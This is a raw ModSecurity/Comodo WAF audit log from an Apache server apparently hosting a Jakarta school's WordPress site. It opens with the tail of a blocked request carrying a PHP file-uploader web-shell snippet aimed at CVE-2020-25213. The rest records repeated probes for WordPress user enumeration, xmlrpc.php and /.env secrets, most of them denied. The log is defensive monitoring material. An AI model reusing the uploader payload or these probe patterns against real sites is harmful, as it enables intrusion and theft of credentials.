';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}} } ?> --5fbb6cf0922da7f286f5eb3f3543fa55-- --963ec72a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --963ec72a-E-- --963ec72a-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||up.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567251644898 3685 (- - -) Stopwatch2: 1747567251644898 3685; combined=2362, p1=423, p2=1880, p3=0, p4=0, p5=58, sr=70, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --963ec72a-Z-- --3867f002-A-- [18/May/2025:18:33:04 +0700] aCnFcFewLfDrCkDGIGyLegAAANc 103.236.140.4 44084 103.236.140.4 8181 --3867f002-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3867f002-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3867f002-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567984684367 4594 (- - -) Stopwatch2: 1747567984684367 4594; combined=2399, p1=781, p2=1583, p3=0, p4=0, p5=35, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3867f002-Z-- --58703e5f-A-- [18/May/2025:18:33:10 +0700] aCnFdlewLfDrCkDGIGyLiwAAAMg 103.236.140.4 44204 103.236.140.4 8181 --58703e5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.129 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58703e5f-C-- demo.sayHello --58703e5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58703e5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747567990673659 6667 (- - -) Stopwatch2: 1747567990673659 6667; combined=5448, p1=610, p2=4555, p3=49, p4=70, p5=96, sr=74, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58703e5f-Z-- --43af4d4a-A-- [18/May/2025:18:46:37 +0700] aCnInVewLfDrCkDGIGyOFQAAAM0 103.236.140.4 57390 103.236.140.4 8181 --43af4d4a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --43af4d4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43af4d4a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747568797255961 3017 (- - -) Stopwatch2: 1747568797255961 3017; combined=1387, p1=479, p2=879, p3=0, p4=0, p5=29, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43af4d4a-Z-- --5dcd4205-A-- [18/May/2025:18:46:46 +0700] aCnIplewLfDrCkDGIGyOGAAAAMA 103.236.140.4 57576 103.236.140.4 8181 --5dcd4205-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5dcd4205-C-- demo.sayHello --5dcd4205-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dcd4205-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747568806614927 6050 (- - -) Stopwatch2: 1747568806614927 6050; combined=4433, p1=635, p2=3576, p3=37, p4=40, p5=86, sr=68, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dcd4205-Z-- --f18cb716-A-- [18/May/2025:19:34:47 +0700] aCnT5xir-GlPrFVVKe6ARQAAAE8 103.236.140.4 35426 103.236.140.4 8181 --f18cb716-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f18cb716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f18cb716-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747571687754833 2361 (- - -) Stopwatch2: 1747571687754833 2361; combined=1260, p1=406, p2=819, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f18cb716-Z-- --11c41e58-A-- [18/May/2025:19:34:55 +0700] aCnT70PRqak7bVuUS6dh4AAAAJI 103.236.140.4 35604 103.236.140.4 8181 --11c41e58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.234 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --11c41e58-C-- demo.sayHello --11c41e58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --11c41e58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747571695516012 5934 (- - -) Stopwatch2: 1747571695516012 5934; combined=4126, p1=474, p2=3389, p3=32, p4=36, p5=116, sr=61, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11c41e58-Z-- --eb0bc635-A-- [18/May/2025:20:07:42 +0700] aCnbnvypzAd0elWOk7qLlgAAAA0 103.236.140.4 57812 103.236.140.4 8181 --eb0bc635-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.237.186.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.237.186.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eb0bc635-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb0bc635-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747573662777116 2739 (- - -) Stopwatch2: 1747573662777116 2739; combined=1363, p1=448, p2=875, p3=0, p4=0, p5=39, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb0bc635-Z-- --b92d687b-A-- [18/May/2025:20:21:05 +0700] aCnewVewLfDrCkDGIGyq_wAAAM8 103.236.140.4 48188 103.236.140.4 8181 --b92d687b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.76.189.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.76.189.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b92d687b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b92d687b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747574465867409 2673 (- - -) Stopwatch2: 1747574465867409 2673; combined=1126, p1=348, p2=748, p3=0, p4=0, p5=30, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b92d687b-Z-- --84c98451-A-- [18/May/2025:20:22:19 +0700] aCnfC_ypzAd0elWOk7qRAgAAAAE 103.236.140.4 49596 103.236.140.4 8181 --84c98451-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --84c98451-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84c98451-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747574539119811 2652 (- - -) Stopwatch2: 1747574539119811 2652; combined=1136, p1=400, p2=702, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84c98451-Z-- --aeaeb049-A-- [18/May/2025:20:22:26 +0700] aCnfEkPRqak7bVuUS6dztQAAAIo 103.236.140.4 49792 103.236.140.4 8181 --aeaeb049-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.63 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aeaeb049-C-- demo.sayHello --aeaeb049-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeaeb049-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747574546778881 13523 (- - -) Stopwatch2: 1747574546778881 13523; combined=19689, p1=650, p2=3615, p3=34, p4=67, p5=7675, sr=74, sw=49, l=0, gc=7599 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeaeb049-Z-- --b314f904-A-- [18/May/2025:20:31:11 +0700] aCnhHxir-GlPrFVVKe6RaQAAAFg 103.236.140.4 33732 103.236.140.4 8181 --b314f904-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b314f904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b314f904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747575071972501 3189 (- - -) Stopwatch2: 1747575071972501 3189; combined=1486, p1=523, p2=927, p3=0, p4=0, p5=35, sr=143, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b314f904-Z-- --8240e16d-A-- [18/May/2025:20:31:20 +0700] aCnhKBir-GlPrFVVKe6RhwAAAFM 103.236.140.4 33932 103.236.140.4 8181 --8240e16d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8240e16d-C-- demo.sayHello --8240e16d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8240e16d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747575080820278 6647 (- - -) Stopwatch2: 1747575080820278 6647; combined=4814, p1=597, p2=3984, p3=40, p4=47, p5=86, sr=72, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8240e16d-Z-- --0716a611-A-- [18/May/2025:20:34:49 +0700] aCnh-VewLfDrCkDGIGyxaAAAANc 103.236.140.4 38196 103.236.140.4 8181 --0716a611-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.128.227.125 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.128.227.125 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --0716a611-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0716a611-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747575289515475 840 (- - -) Stopwatch2: 1747575289515475 840; combined=378, p1=338, p2=0, p3=0, p4=0, p5=40, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0716a611-Z-- --c579c938-A-- [18/May/2025:20:34:54 +0700] aCnh_vypzAd0elWOk7qUtgAAAA8 103.236.140.4 38232 103.236.140.4 8181 --c579c938-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.128.227.125 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.128.227.125 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --c579c938-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c579c938-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747575294002771 828 (- - -) Stopwatch2: 1747575294002771 828; combined=383, p1=277, p2=0, p3=0, p4=0, p5=105, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c579c938-Z-- --387df515-A-- [18/May/2025:20:38:13 +0700] aCnixRir-GlPrFVVKe6TPwAAAEE 103.236.140.4 42766 103.236.140.4 8181 --387df515-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --387df515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --387df515-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747575493779381 3436 (- - -) Stopwatch2: 1747575493779381 3436; combined=1583, p1=475, p2=1079, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --387df515-Z-- --4ffdb272-A-- [18/May/2025:20:38:20 +0700] aCnizEPRqak7bVuUS6d4sgAAAIs 103.236.140.4 42970 103.236.140.4 8181 --4ffdb272-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4ffdb272-C-- demo.sayHello --4ffdb272-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ffdb272-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747575500837085 6058 (- - -) Stopwatch2: 1747575500837085 6058; combined=4816, p1=658, p2=3910, p3=38, p4=44, p5=98, sr=118, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
